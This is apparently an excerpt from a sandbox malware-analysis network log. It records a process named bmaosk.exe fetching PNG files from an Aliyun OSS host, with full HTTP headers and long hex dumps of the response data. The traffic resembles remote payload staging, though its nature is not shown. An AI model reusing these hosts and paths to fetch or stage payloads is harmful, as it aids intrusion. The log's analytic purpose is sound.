                                                                                Last-Modified: Fri, 22 Mar 2024 09:16:17 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 2580453812540855072
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000105
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: nihcI8naGHsxMFHdb+tCZg==
                                                                                x-oss-server-time: 1
                                                                                2025-01-10 01:29:35 UTC3552INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 54 00 00 02 c0 08 06 00 00 00 76 4e 6b 38 00 00 20 00 49 44 41 54 78 9c 9c fd 0b 96 ec ba 0a 2d 0a 8a bc bd a8 46 57 7b aa 2d af 2f 37 f8 b3 d1 4e bf 8d 41 ac 7f c6 ab ba 6d bd da 8e f1 7d ef 1a ce 4e 84 d6 b6 6a dd 91 e4 21 da 72 92 f0 7d 6a 8f 11 5b e0 04 fa 4d d4 61 15 b7 2f ea 17 a3 dd 1b 32 8a 47 49 5c 28 3b 5b 4b 08 39 62 1a a3 27 c9 09 8d 31 ad 47 eb 82 90 50 c5 cf 98 f3 27 3d 64 f6 3b 33 dc 51 8b 51 78 38 38 70 7a b5 26 d2 3a 9b d7 ca 3b cb bc 44 c7 0b 0e 59 fd 4d 60 a7 98 14 ff 07 06 26 ba 2a b2 a1 11 e1 a2 9c d3 7a bb 02 b9 c8 59 52 03 8e 3c 34 cd 27 c0 32 4a d7 55 0c ac 7a a0 71 ee d8 ee b0 d3 b6 11 21 10 a8 fc a0 a8 32 82 6a e9 da 11 a2 11 e6 ae dd 3b 0e 09 4d 30 13 c2 38 64 d8 39 69 de
                                                                                Data Ascii: PNGIHDRTvNk8 IDATx-FW{-/7NAm}Nj!r}j[Ma/2GI\(;[K9b'1GP'=d;3QQx88pz&:;DYM`&*zYR<4'2JUzq!2j;M08d9i
                                                                                2025-01-10 01:29:35 UTC4096INData Raw: 0a d7 92 25 eb f9 09 1a e6 06 e2 9d 48 ac 4a c2 fa 01 eb 5e 5e a4 6b a9 d7 b6 e4 c4 87 c9 a2 a1 1a a8 27 67 36 a6 e1 29 a9 30 2a 4d 98 5d 7e d7 8d 82 01 77 55 e0 15 6b e6 89 43 42 f6 1e 35 e1 22 ad 9e 81 39 14 ec 9c 69 10 31 16 ae d2 7e 19 03 13 b4 89 67 8a 65 0e e4 3b c5 b0 b9 3e 67 26 30 aa 16 2b 6e 02 c4 a8 82 61 18 b7 6f 1e ef f1 23 b8 3e 98 a9 1f e8 b6 9a 83 04 e2 8a b6 ae 85 3b c3 83 8e 0d e4 3e 01 bd 0c 8f b1 3f d4 99 3e 3d e6 fa f7 cc 9b d0 d5 6d 24 67 f1 aa 30 4e e8 32 54 84 f7 0c 89 48 37 e2 5b f4 f8 d4 82 d7 3a 07 c5 1a b2 15 cf d0 dc 23 73 39 1e 63 9e ea 64 37 b0 e5 d5 58 7c c7 3b 45 49 46 63 44 6c 3e 40 6d 3a 64 17 ea 4c 04 19 b6 49 d6 5a 49 95 a8 74 9c 35 a3 77 4e b0 d3 ea 28 8e 9a 2f dc e2 28 e5 6d e7 05 06 3d 82 7e 6f 1f df 64 22 c2 99 61
                                                                                Data Ascii: %HJ^^k'g6)0*M]~wUkCB5"9i1~ge;>g&0+nao#>;>?>=m$g0N2TH7[:#s9cd7X|;EIFcDl>@m:dLIZIt5wN(/(m=~od"a
                                                                                2025-01-10 01:29:35 UTC4096INData Raw: 26 a6 8e 04 d0 06 2c c8 a5 50 da f8 ab 10 86 d2 79 17 49 c6 1c ae fb 87 17 a8 2b 09 77 77 a4 7c b3 b8 24 b1 d2 67 15 00 57 0c 66 9d 13 cc 50 30 82 54 4a 87 18 13 5a 6d 9d ab 52 d4 a7 ae f9 8c 19 47 58 51 d3 b3 b2 32 3e c4 6a c5 85 bd f7 41 ef e1 1b f9 e7 3c 28 66 30 aa a0 45 0e 98 7e 4b 9c ec f1 8f 5b c9 8d 91 9f f6 14 6c 97 f3 87 18 74 46 86 9a 01 a8 a1 b2 ee 20 32 39 a6 cd d1 be 2f ee ae f8 e3 a6 f9 eb 3e 5e 8c 1b cc 3c 51 e0 ee 67 4b 74 d1 67 fe 93 dd 51 99 9d 36 b7 3f 56 db 72 22 20 30 5f 85 bb 6b a8 ad 43 39 c1 53 72 ac e2 fe bc ab 48 33 af c8 d4 73 29 a7 66 52 d0 d8 f9 ea 6b 99 62 73 74 81 42 de 38 e5 fa 79 88 b6 cb ca 9c 56 cc 19 95 95 ac 62 77 7f 60 92 12 d7 be 73 aa e1 f0 df 96 e2 05 63 6d da cb 44 47 72 47 53 5a f3 0e 97 45 27 48 70 a1 ed 31 17
                                                                                Data Ascii: &,PyI+ww|$gWfP0TJZmRGXQ2>jA<(f0E~K[ltF 29/>^<QgKtgQ6?Vr" 0_kC9SrH3s)fRkbstB8yVbw`scmDGrGSZE'Hp1
                                                                                2025-01-10 01:29:35 UTC4096INData Raw: 17 e8 c1 cb 76 16 dc 71 70 3c c4 26 0f d2 f8 c5 94 b7 99 09 9e 5f 35 2e 94 4e d6 6b 76 b6 f8 a8 fc b3 99 df 1c 31 c0 ab 2c 14 e6 a1 61 99 3d 37 06 ba 84 33 13 7d 2f 30 ec 72 08 35 3e 54 27 79 13 d2 c4 f7 78 d9 d0 f1 80 d6 ee 5d 4b fd 3f 0c 3f e3 d1 d5 f7 68 d8 10 d0 c2 29 cd 8b 22 34 1e 83 d1 a1 e4 61 ed 10 6e 44 db 31 a4 9e 14 31 b4 c5 8a 48 b2 09 5a 4d d0 8f 69 bf b4 00 76 73 f4 e4 0b 20 d8 72 b8 38 8b c6 bd dc aa b0 21 5a bf 9b b6 5e 50 39 92 04 35 27 4b e8 9e 7c a9 90 51 40 41 52 5d 2e 14 50 5c 84 8c 5f f0 29 79 c1 24 54 d3 25 e3 a9 c2 65 3c 84 2c 1b 90 e5 5c 34 d0 4d 1f 59 f7 f8 ab 25 da a8 33 39 6a ea 78 87 82 71 55 91 65 42 99 19 65 db 99 70 58 5f 6a d5 6b c3 26 70 df cd 87 dd 2b 2f 73 e7 94 93 a1 22 41 cd 62 1f 4b 74 ca 3a 2b d5 cb cb 49 e6 20 f9
                                                                                Data Ascii: vqp<&_5.Nkv1,a=73}/0r5>T'yx]K??h)"4anD11HZMivs r8!Z^P95'K|Q@AR].P\_)y$T%e<,\4MY%39jxqUeBepX_jk&p+/s"AbKt:+I
                                                                                2025-01-10 01:29:35 UTC4096INData Raw: 52 fb c1 10 6c a6 dd 2d 6d bb 5a 8c 69 09 52 d4 3d 29 a0 af e0 8b fa 3e 0f 57 40 7a 42 21 7e 74 e2 46 c4 c1 93 69 e4 85 56 ca 8c dc a2 76 17 25 39 4f a3 b0 d6 bf 88 6c ad 3b 6a d2 43 1c db 98 7c 85 b3 f7 d2 b6 87 3d f2 27 ad c3 6c cf bf a9 52 71 4a e9 19 d4 68 00 44 4d 63 87 a9 a2 0c f4 37 bc a5 e4 9c c0 f5 59 eb 23 ec 54 80 e7 cd c4 11 c3 a1 19 70 53 05 89 50 d7 b3 75 19 3b f1 ec 7c f7 97 aa 02 7c 73 74 3f 2a c9 16 27 83 11 37 b9 3b a6 95 8b 0b 21 9d b4 ad c6 2a 56 32 46 2c a2 f6 df b1 cd 28 a0 bb 18 56 1b c5 69 85 5c e3 dc 57 ba 61 87 3c c8 c2 f4 76 12 64 84 c0 73 97 56 8c 48 f8 64 aa 26 2a 0c 54 12 80 50 67 3e f7 be ed ed d3 70 bd bc 9a 4e 65 1a c6 23 7c 7e 7e 42 91 53 57 7a ec 7c ea 1e e6 2a df e4 4e 85 68 86 f7 f1 22 61 52 e7 89 6d c9 76 e8 fe 45 c3
                                                                                Data Ascii: Rl-mZiR=)>W@zB!~tFiVv%9Ol;jC|='lRqJhDMc7Y#TpSPu;||st?*'7;!*V2F,(Vi\Wa<vdsVHd&*TPg>pNe#|~~BSWz|*Nh"aRmvE
                                                                                2025-01-10 01:29:35 UTC4096INData Raw: f5 31 70 b2 09 80 f5 03 e5 56 7d fb e1 36 f4 41 34 c3 66 51 03 9c 32 dd a5 4c 32 8e f5 99 cc bf 81 ba c1 78 fb 95 a7 cd 47 a6 12 b2 91 2f 81 53 56 38 8e 30 86 89 ed 0d d3 1e d1 11 73 1b e9 7e 28 61 76 3e 44 e0 2c ca 42 54 38 fa a4 69 53 dc b2 00 9c f3 e8 1d e0 e2 bc ac 3a db cd 35 d6 da 63 1e 96 63 9e a0 b2 1f 26 43 c6 e4 1f 21 3d a0 83 7b 6e 88 72 36 4c b3 32 66 f1 0c a4 b6 64 4b 88 99 2e 11 fa 6c e5 da d3 5a 78 c9 83 08 2f 40 73 a7 a4 d4 5e 26 5e 11 60 94 40 93 83 6e de ff 5d d9 cd e7 15 cf 5d 84 7e 21 de 29 60 51 e8 b6 c7 0a 75 db b3 73 e9 24 2a a3 d1 53 5f 7e ce 3c b3 9e 62 ab 5e 7b 10 ee c6 de 59 2c 61 4e 44 0e b7 04 f7 24 0a 62 09 68 ba f8 e7 28 ae 77 3c 96 da 38 22 54 76 f9 8f ef 0b ac a3 08 c7 1c 6f ca 34 c0 c2 55 5c 44 c7 43 01 20 03 c4 3b 77 06
                                                                                Data Ascii: 1pV}6A4fQ2L2xG/SV80s~(av>D,BT8iS:5cc&C!={nr6L2fdK.lZx/@s^&^`@n]]~!)`Qus$*S_~<b^{Y,aND$bh(w<8"Tvo4U\DC ;w
                                                                                2025-01-10 01:29:35 UTC4096INData Raw: 90 6b e4 2c bd d7 53 84 08 52 cd 3f 7d 50 02 52 cb 5c 84 93 fa 52 b9 03 71 75 a2 df 12 0d 22 11 8c d0 85 1c 37 5a fb 7b 32 b8 ea ac 12 0d b9 ee 5f 50 b0 26 c2 06 4e b3 11 89 90 ae a0 a2 a2 c3 2b fa f5 ae 0c 24 a1 43 e5 ac 44 f4 db cd 81 fa 54 84 df c0 85 15 54 3b 5b bf bb 52 90 b7 01 1b 9e 12 a4 44 4c b3 12 86 c6 c7 f7 59 14 79 c6 c3 19 4a 4b 2a c2 1e 60 33 a2 62 e7 11 20 ef 67 94 6a 50 21 93 7c db 89 7d 41 df 08 6f 56 77 e3 65 ea a1 ae ee 30 46 93 36 b7 09 ad c3 22 9e 7d a9 76 1a b4 b1 47 87 d3 0a 1c e5 45 5d f6 1c 29 de fa 4b 22 43 b2 5b b3 fd 30 45 0b a9 7c 28 af aa 88 e7 c4 0f e9 13 ad 03 06 05 2a ba af dc 71 9e 8b 3e ab 50 d2 c2 01 a9 d3 78 45 e1 6d 3d 9a f5 dd fb e3 1e fa c8 ee 54 bc fb 5f 5e 2c eb 03 6a 61 ca 7c 40 78 76 97 f5 15 4a 6b 0f f2 f7 c1
                                                                                Data Ascii: k,SR?}PR\Rqu"7Z{2_P&N+$CDTT;[RDLYyJK*`3b gjP!|}AoVwe0F6"}vGE])K"C[0E|(*q>PxEm=T_^,ja|@xvJk
                                                                                2025-01-10 01:29:35 UTC4096INData Raw: 82 d5 1e 5f ed 61 54 e7 73 08 f9 2f 0c b3 0c b5 0b 7e c5 94 13 a2 6c 60 0e ef de 4b 8c ce 53 41 5d 66 66 5d 73 0f ec 3d ed ec d6 e8 3a fc c3 10 53 4c e2 83 81 b2 ed a7 c3 66 a0 59 24 aa 4d 11 46 1b a1 64 a0 19 2a 7d 40 df 58 9c 77 65 17 f9 3c 7d 1f 71 24 a1 d7 09 c5 0b 4e 06 82 24 4e 61 59 12 b4 23 3d 4d b8 97 1e 57 d6 ab 8a 37 4e 85 d4 3f 01 bd 6b c6 d7 e2 fd 31 7c 6d 65 3e 45 b4 96 5e 1a b7 24 f2 98 22 ce a0 6c b5 ec 90 07 f5 f1 f4 08 1a 9c 85 75 f7 bd 56 75 7e a0 38 d8 c6 48 6c 70 15 4b d2 f2 56 94 04 74 a4 89 a0 f9 1d 2e 32 e0 fd c0 ad 8e 14 df f4 78 f7 b2 d8 7d dc 9e ec b0 06 2e 61 cd 86 b7 c7 09 3c 2a 95 3b 2f 13 35 67 36 a0 2e c1 0a 39 b6 a1 dd 56 c9 bb 8c 41 a5 c9 88 ad a9 d2 e5 e0 2a 52 7b 45 b0 59 43 4a 98 a7 e1 c4 0d 18 2f 0e 57 ba 34 dc 1d f6
                                                                                Data Ascii: _aTs/~l`KSA]ff]s=:SLfY$MFd*}@Xwe<}q$N$NaY#=MW7N?k1|me>E^$"luVu~8HlpKVt.2x}.a<*;/5g6.9VA*R{EYCJ/W4
                                                                                2025-01-10 01:29:35 UTC4096INData Raw: 1b 21 35 61 1a 11 18 6e 7b 42 20 36 0b 12 58 8d 23 ff 35 3e fa 04 7f 02 4d 67 99 7c b3 ea 88 f5 fc f1 32 c1 f2 c5 66 16 c6 e3 d2 86 d2 aa 3e f6 eb 9d 27 0d 12 be a1 9b ca 73 a8 54 4b ea cf 9d 5e 08 47 c3 6e 8a 4b 41 db b2 4d 19 c2 78 6a b0 c1 e1 30 57 40 11 d0 1f 6b ef c2 75 65 d0 c9 83 7d 3c c9 bb e6 85 fe d5 09 45 5b bd 5a fd 86 40 5b a6 d9 89 19 99 b8 6d eb d0 4e 4a 43 64 3d 0e 1d 9c de 9a 59 4a fe 08 c2 47 1f ad 17 31 a0 4e ec 12 b3 17 94 35 ed 86 87 0d c7 b8 9d a0 0f aa 3e 5d f7 ff 09 0e 60 30 0a 12 e4 3b 53 41 9c 09 07 ba 8b 74 56 3f 66 d0 ee 20 a7 03 ce 4c 5d e5 ff 34 a5 69 e8 17 e3 7d 1f 51 3d 0d 18 b6 99 6b c1 4e 72 9e e5 db ed 7c a6 73 4a 5d 5a 54 77 d4 06 76 d5 b1 69 54 26 e1 e4 0d b8 3f 27 86 5d 9c fa 50 d0 9f 38 8d 82 2b b4 8a b5 fd c7 54 fe
                                                                                Data Ascii: !5an{B 6X#5>Mg|2f>'sTK^GnKAMxj0W@kue}<E[Z@[mNJCd=YJG1N5>]`0;SAtV?f L]4i}Q=kNr|sJ]ZTwviT&?']P8+T
                                                                                2025-01-10 01:29:35 UTC4096INData Raw: 66 0d be 2a cd 0a 6b c5 13 7e 2c 10 4a 5e 67 dd 43 bd e2 87 d0 82 c3 40 7e 1b bd 21 4a 2e 2e 9a 83 5a 43 e9 94 18 6b b9 c7 2a 66 6e f4 09 89 34 0e db cb fd f5 7b bd 63 39 c1 b7 7f de d1 72 b3 b5 1f 7b d6 e3 a5 95 65 b3 c8 de 7d 85 60 c8 88 d0 2b da ba 73 f2 47 be 6f ee 94 ee ae 58 26 81 f0 e4 4f dd 3e 1e 76 b2 76 9a 6e b1 7d e2 92 a9 bc 6a 96 44 e3 04 e3 94 54 64 28 7d 87 58 54 b3 a1 68 5a 1d 66 8c 3a 89 ff 5f 78 9b 58 e4 b5 68 27 63 3d 16 2f 7a 2f e5 d0 33 76 60 5a 44 19 8a 55 e3 f0 43 12 6f 0a 56 80 5a 15 96 13 8f 9c 41 ee 8d 09 b3 42 e2 76 86 f6 70 cf 0b 29 67 00 66 2e 92 0d 2c 91 d8 c2 89 37 e5 ac 9f 46 e8 49 0f f5 d8 09 c8 41 5e 26 1a b3 c6 93 49 2b 0b 1d b7 ed 44 38 5a ee d5 5b d4 be 36 25 d5 d5 47 f7 22 62 d6 eb 68 22 06 73 c9 d2 4b e7 82 57 43 0b
                                                                                Data Ascii: f*k~,J^gC@~!J..ZCk*fn4{c9r{e}`+sGoX&O>vvn}jDTd(}XThZf:_xXh'c=/z/3v`ZDUCoVZABvp)gf.,7FIA^&I+D8Z[6%G"bh"sKWC


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.560501118.178.60.1034431220C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:29:37 UTC127OUTGET /dsb-hr3.png HTTP/1.1
                                                                                User-Agent: Chrome/114.0.0.0
                                                                                Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:29:37 UTC545INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:29:37 GMT
                                                                                Content-Type: image/png
                                                                                Content-Length: 357504
                                                                                Connection: close
                                                                                x-oss-request-id: 67807801A9669931370D44B7
                                                                                Accept-Ranges: bytes
                                                                                ETag: "2977911419E268860C5E85E967E5C13E"
                                                                                Last-Modified: Sat, 13 Jul 2024 15:18:19 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 9585452185678011734
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000105
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: KXeRFBniaIYMXoXpZ+XBPg==
                                                                                x-oss-server-time: 7
                                                                                2025-01-10 01:29:37 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 54 00 00 02 c0 08 06 00 00 00 76 4e 6b 38 00 00 20 00 49 44 41 54 78 9c 9c fd 0b 96 ec ba 0a 2d 0a 8a bc bd a8 46 57 7b aa 2d af 2f 37 21 a8 9c 0d a6 87 5a a6 77 c6 f9 24 18 ad d2 a2 7f c3 44 ba ce 4e 6c 76 be 69 d8 91 e4 6a f0 7f 34 a0 3a 9b 21 8c 09 48 40 89 3e 33 93 fe c7 44 ab 77 84 ce 30 0a 4c 1b f1 96 c9 bb 57 fc 05 46 f8 0f 79 12 8a 88 68 72 3e ee 57 df 71 ba 6a b8 79 58 0c cb 9c 90 eb bb 4e fb 09 13 4e 79 98 6c f7 73 16 1f d2 7e a1 c5 26 33 08 50 ac ac 8d 66 ff 34 3f cf 26 ba 23 50 10 1f c3 3c e3 e2 b9 79 22 d7 15 78 b3 d2 c4 66 02 62 ae 4a 53 dd ea ce e4 14 49 3f 98 17 08 73 f4 7d 54 45 32 9c 41 06 71 ce fd 4f 2a 6b 49 10 c2 50 bd 4d ab 68 c3 fb ea 41 3d 97 d8 a7 56 39 05 d5 05 a3 e9 41 88
                                                                                Data Ascii: PNGIHDRTvNk8 IDATx-FW{-/7!Zw$DNlvij4:!H@>3Dw0LWFyhr>WqjyXNNyls~&3Pf4?&#P<y"xfbJSI?s}TE2AqO*kIPMhA=V9A
                                                                                2025-01-10 01:29:37 UTC4096INData Raw: 8c 62 15 f5 0e 67 83 25 70 72 63 6c ce f2 f7 5a 9f 27 80 5c 92 c4 16 a6 f4 12 6f 67 16 f1 c5 5b 9d ea 1b ed db 9e 58 10 8b 30 a5 0f c2 07 fe 09 01 09 ba af fa 7f 0b b6 d8 c2 4d 9d 48 b2 95 4d 18 28 4d 33 93 85 bc 89 9b 9b 19 b7 3b ae 2f 1d 04 60 03 9d 19 fa 37 21 f4 0d ea 17 d3 f1 47 6a 53 0a 2f 09 33 e3 e0 f4 9a 2e 8f ed 53 08 4e 13 50 06 7e 5c 77 07 8e da d6 56 26 7c a0 d3 d9 c5 ac 3b ed ab f2 24 44 bd 53 f4 87 d3 c5 53 77 08 3d 8e bd dc 4e 37 51 b4 94 2d 03 ef 98 a7 54 f7 1b a8 c5 f8 f1 e1 c3 e6 1d 13 c1 8d b4 93 ac 3f d5 18 da 1b 14 36 96 d3 41 8a 29 28 55 19 27 b6 04 cf 25 1e c2 28 2e e0 ac d1 c4 79 b5 c3 09 35 f8 49 b8 7a 39 d9 83 68 5c 23 7f 2d 9e bc a5 75 9c ce 20 b8 ba 03 26 ae 37 3c 95 e2 73 fe 99 b6 38 c3 58 bb d1 09 1c 70 7c 1f 47 b8 cc ec b7
                                                                                Data Ascii: bg%prclZ'\og[X0MHM(M3;/`7!GjS/3.SNP~\wV&|;$DSSw=N7Q-T?6A)(U'%(.y5Iz9h\#-u &7<s8Xp|G
                                                                                2025-01-10 01:29:37 UTC4096INData Raw: f8 0d 1a ed d7 20 cc b6 ea a7 ef bf 12 e0 fb 20 6a 4d 3d 7b d8 bf 8a 25 40 9b 9e 91 c2 15 44 17 2a 9f 19 07 b9 f4 3a ca ac 73 ca a6 b0 5d f6 24 5b eb 02 43 93 df d9 be b4 a4 1a 5e 2d 00 e5 c2 54 9a 4d 73 87 79 a7 ed 01 4b 8d ff 65 b7 dd 49 e0 8d ef 9a 81 cc a3 5a b6 75 0e b0 f1 c5 16 3f 56 b9 06 7f c5 00 f6 3e 7f da 08 db f2 46 91 8e 70 49 f6 20 05 5c 0b e0 4d 9e 50 24 29 a4 13 44 28 77 51 13 78 dc 5a 73 ff 6c 51 65 46 b0 f6 ed b0 f3 be a1 c9 9b 83 95 5c 97 d2 da 5d a1 00 79 53 77 9b cc 90 b9 90 25 38 c8 3e 8b f9 a8 40 bc 38 9a 67 69 51 ef 40 00 49 f7 39 aa 1f 54 ff 23 f3 b8 10 10 d1 90 1c 69 92 f1 04 f7 3c 76 a6 32 03 d8 39 36 b8 5f 6b 36 4b f9 1e 29 7e 8f 8e 1f 29 08 5d 03 a0 43 50 37 ca 71 cd 09 21 ce 8e 09 e9 13 85 51 57 dc e0 cb 9f dd a2 08 d6 85 3a
                                                                                Data Ascii: jM={%@D*:s]$[C^-TMsyKeIZu?V>FpI \MP$)D(wQxZslQeF\]ySw%8>@8giQ@I9T#i<v296_k6K)~)]CP7q!QW:
                                                                                2025-01-10 01:29:37 UTC4096INData Raw: cf 4f 41 8f a8 a5 3d c1 e5 8c b1 22 26 ca 3c 3c a7 cf 01 91 58 fd 57 ff ed d8 b7 45 67 01 13 b6 86 13 86 01 90 75 51 1e 4c 70 ce fd 2f 1a 63 c3 52 c6 9d 4c d1 ef 2d db 26 30 b5 36 b6 07 12 1e 14 e7 fd 90 f5 e6 f0 6a 58 46 73 59 05 38 ff a2 d2 fb 11 77 7f 8b f0 e2 08 b0 49 0e 96 00 f4 99 09 cd 5f 10 18 83 59 5d 68 f1 84 c2 09 d7 1a ca fe c5 03 4a b8 24 56 2c ae 54 76 a5 d6 cb c3 c4 d4 2f fe 29 67 08 06 b5 e8 2a f5 76 1d e6 08 91 59 53 03 62 b8 05 c9 04 4c ec 51 ea e7 64 08 85 a0 ad 54 f4 f1 6d 0c fa b7 26 48 49 80 e2 ef c7 bc e2 df e6 42 91 9f 36 66 86 82 a9 09 f3 3b a6 bf ff 58 7a d8 de ad d3 0a 52 1c 8e 55 6d d3 b7 63 bc e6 a8 c9 19 b4 26 09 47 04 58 b2 ca 91 76 29 77 25 8b 48 cd a8 7e 20 a2 24 6e df 76 39 4c 3b d9 2d ae 31 82 99 5b 8f c7 bb f7 c5 c8 5b
                                                                                Data Ascii: OA="&<<XWEguQLp/cRL-&06jXFsY8wI_Y]hJ$V,Tv/)g*vYSbLQdTm&HIB6f;XzRUmc&GXv)w%H~ $nv9L;-1[[
                                                                                2025-01-10 01:29:37 UTC4096INData Raw: 20 d7 e6 4b d8 d6 ff a7 39 9e d4 ea 4c 2b 99 c5 2f 7b a7 6d db 13 3a 0b 23 1a fb 9c c1 a3 d8 19 5b b9 2e a0 f1 ac b0 be 60 bc ee a3 07 51 89 b5 f2 9a e6 a9 02 99 2d 41 2a 1b ba b8 bc ac 10 35 86 7b 47 b0 b8 79 1e d7 f6 c0 b8 10 45 85 c8 80 51 8a 9f 16 a1 f3 aa 1f 36 63 f1 d7 d7 3b 63 d9 a7 8f 57 cf 3f 6a a7 26 22 bd ee 1f 7d a0 ae be bc 84 2b 91 26 59 bb f3 9c 64 2c df 8b 18 42 33 06 f4 1c 71 53 34 9d 75 d8 12 9f 3a 0a 78 36 24 2b 85 2d ff bf 91 6b a6 dd 0a 3c b8 61 b0 43 ef 39 d3 6c ac 8a 2a dc 61 8b 83 3f 67 ea 7b d2 65 18 1d 2f bc 27 d6 7b 0c eb be a3 a1 3f 87 78 7e 5c 6b 86 c9 90 aa 73 7b da f1 6e 5d 5e 32 48 bf d5 ac 64 c9 9f 75 d9 0d b2 b0 21 69 7b ae 16 80 9f c4 36 37 36 3b f3 95 14 ba e1 e3 e2 cc bf b8 6a 80 93 13 ca ac 30 f1 2e 87 60 f1 e5 37 37
                                                                                Data Ascii: K9L+/{m:#[.`Q-A*5{GyEQ6c;cW?j&"}+&Yd,B3qS4u:x6$+-k<aC9l*a?g{e/'{?x~\ks{n]^2Hdu!i{676;j0.`77
                                                                                2025-01-10 01:29:37 UTC4096INData Raw: eb 57 4f 63 5c cc 42 b4 4e bf a4 71 d9 c4 a8 49 0d 65 77 c9 28 ce dd 85 44 1d 86 43 86 9e 4c 31 21 d2 41 d6 fc f3 bc de 57 be bc 58 e3 8b fb 22 7b 1a 86 e3 b5 90 bd 7c ed 96 57 e0 ef 7c 8a 8d ba c2 78 12 a7 94 e4 bb 49 0f b8 5b 33 f1 9d 3e 3e 83 13 44 16 e4 19 28 30 da 19 f4 58 77 59 d1 c1 4f ac 78 89 0c ca e9 a6 41 52 57 95 42 28 4a 8f 9c b0 51 65 15 a1 0b 92 e0 b9 9b c0 98 83 0c df 14 3d 3c 13 cb f3 40 83 0a 1a 8c cc 39 8a 9e 7b 65 89 31 42 8b 8d ce 8d da c5 33 dc 6c c6 8d 33 83 bd 72 3f 33 af fd 57 98 2e 30 19 14 39 28 7f 84 26 6c bf ae 57 b7 0c 5b c0 26 4b ea c3 f3 48 0f c1 aa ad 31 a9 35 a4 56 90 3f 12 a1 4f fb 4d 96 19 ac 80 6a 02 10 f9 4f ce 02 88 a7 d2 90 84 bc 5d a2 a2 87 83 c7 f6 44 93 95 40 5d f0 9e 39 68 f6 e6 27 9a 0b a9 af c3 6b 96 a1 5e f3
                                                                                Data Ascii: WOc\BNqIew(DCL1!AWX"{|W|xI[3>>D(0XwYOxARWB(JQe=<@9{e1B3l3r?3W.09(&lW[&KH15V?OMjO]D@]9h'k^
                                                                                2025-01-10 01:29:37 UTC4096INData Raw: 1f 44 91 aa 8b bc 05 55 03 25 ad 18 97 34 b5 aa 8c f0 cc 5f 25 fe 7e 0c fd 4f 29 cb e1 a4 e0 20 0e bd 45 81 36 48 0a 71 60 3a f7 aa 87 1e b3 10 6a 07 b4 1d b1 96 74 37 22 11 0b 26 30 21 26 28 17 b6 eb fc 4c b5 b9 fb cb 96 eb f6 04 cd b8 89 74 bf 62 27 3c fa bc 45 d9 51 dd 8d eb a9 ec e5 6b d6 37 ac 4f c4 c1 47 dc e7 c6 ae 66 85 fd 6e 33 47 7e 0f a6 7e 01 e6 49 9e 0d 8e dd 9a 54 76 84 76 79 5e 0c ad 05 3c ce ea 42 ad b9 c5 50 dc 57 7b 35 83 ed 43 da 47 25 39 b8 55 1c 22 16 a3 3b bb 96 82 d0 3d 54 92 ee ce 23 db 18 6d 95 4b 32 2b 1c 6d 59 76 92 27 38 71 fb e0 b2 c3 ad 33 e4 dc e2 20 9f 4e 1d 8e eb 83 55 33 7e 82 7b 93 4e 81 47 e5 fe ec f6 06 42 20 0e 84 2f 83 23 59 3c 93 27 0b 7d 1c 35 cf ac aa eb 3c f4 69 3c e4 66 73 f1 97 fc c6 dd 8b 59 7a 05 bd d5 cf a8
                                                                                Data Ascii: DU%4_%~O) E6Hq`:jt7"&0!&(Ltb'<EQk7OGfn3G~~ITvvy^<BPW{5CG%9U";=T#mK2+mYv'8q3 NU3~{NGB /#Y<'}5<i<fsYz
                                                                                2025-01-10 01:29:37 UTC4096INData Raw: 92 b2 7c a6 cd 52 9d c4 97 c0 9e db 30 fb 5d a4 ad e8 a8 48 54 db c4 c1 2d 82 be f2 dc 34 c2 e0 cb c3 58 b2 ac 29 24 07 fa a6 d1 ea 1c 4c b8 cd aa 25 f8 5c 42 98 62 f2 68 ad 31 53 06 04 07 4d 6d 99 2f 1d 4e a4 e7 66 2a 65 fc 2b 8b e7 03 54 9c 74 34 bf 2b 4a ad f7 89 96 c1 21 6e 0c e5 8f 2e 55 92 dc a8 c9 6c 5f f9 cf 47 ac 2a 10 a4 fd 23 20 cd f4 0b d8 c2 64 65 7e d1 aa f0 2e c0 56 18 20 d3 64 35 42 41 0e cd b5 e6 ff 77 24 d1 22 03 fc 08 aa 26 41 31 02 36 c2 c6 9a e9 45 58 bd 2b e1 a7 1b 8e 70 44 7e ca 89 33 94 c7 b8 d3 3a e6 87 e2 2e 1d 32 fe 30 c3 a2 2e 39 fc 89 40 45 9a 99 55 3b 30 99 0f d2 b0 17 60 3a 1f e4 d9 79 05 f8 25 f5 fd c4 9a 07 f5 84 30 c2 ab ba 97 95 5f 75 c0 20 12 da 75 e7 ca c7 43 5e c7 6a 4d c7 60 89 11 d3 04 2b 8b da 31 20 6b d0 32 40 61
                                                                                Data Ascii: |R0]HT-4X)$L%\Bbh1SMm/Nf*e+Tt4+J!n.Ul_G*# de~.V d5BAw$"&A16EX+pD~3:.20.9@EU;0`:y%0_u uC^jM`+1 k2@a
